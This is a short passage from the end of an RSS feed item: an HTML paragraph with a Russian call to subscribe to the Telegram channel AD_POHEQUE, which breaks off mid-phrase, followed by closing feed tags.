  <p id="9qgM"><a href="https://t.me/ad_pohueque" target="_blank">Подписывайся на AD_POHEQUE и ставь </a></p>

]]></content:encoded></item></channel></rss>